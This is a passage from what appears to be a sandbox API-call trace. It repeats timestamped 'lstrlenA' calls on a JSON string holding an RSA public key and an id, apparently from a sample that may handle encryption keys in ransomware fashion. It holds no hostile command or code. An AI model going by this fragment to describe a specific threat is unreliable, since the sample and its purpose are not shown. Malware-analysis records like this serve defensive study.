KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.954] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH\"}") returned 540 [0125.955] lstrlenA (lpString="-----BEGIN PUBLIC 